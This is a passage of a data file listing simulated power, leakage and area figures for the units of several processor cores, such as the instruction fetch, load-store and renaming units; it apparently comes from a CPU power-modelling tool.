'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.66344,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.189155,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.249009,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.11174,
'Instruction Fetch Unit/Runtime Dynamic': 0.537928,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0324138,
'L2/Runtime Dynamic': 0.00727038,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.4787,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.08573,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0725203,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0725204,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.82255,
'Load Store Unit/Runtime Dynamic': 1.51589,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.178823,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.357646,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0634648,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0639507,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.289955,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0310118,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.558172,
'Memory Management Unit/Runtime Dynamic': 0.0949625,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 21.5086,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0145459,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.151049,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.165595,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 4.5915,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0721611,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.259367,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.330198,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.224776,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.362555,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.183005,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.770336,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.206454,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.84281,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0623814,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0094281,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.097612,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0697266,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.159993,
'Execution Unit/Register Files/Runtime Dynamic': 0.0791547,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.223685,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.564692,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.07893,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00135148,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00135148,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00121825,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000494095,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00100163,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00492284,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0114888,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.06703,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.26368,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.18852,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.227664,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 6.68912,
'Instruction Fetch Unit/Runtime Dynamic': 0.499625,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0169626,
'L2/Runtime Dynamic': 0.00392565,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.66904,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.17538,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0786785,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0786784,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.04058,
'Load Store Unit/Runtime Dynamic': 1.64207,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.194008,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.388015,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.068854,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0690198,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.2651,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0311681,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.539488,
'Memory Management Unit/Runtime Dynamic': 0.100188,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.7184,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.164097,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0121383,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.112205,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.28844,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.61318,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 4.34557e-05,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202723,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.000283364,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.325217,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.524563,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.264782,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.11456,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.37191,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.55131,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 5.35336e-05,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0136411,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0986563,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.100884,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0987098,
'Execution Unit/Register Files/Runtime Dynamic': 0.114525,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.207852,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.653801,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.49099,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00156156,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00156156,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00137889,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000544058,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00144921,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00595121,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0143013,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0969823,
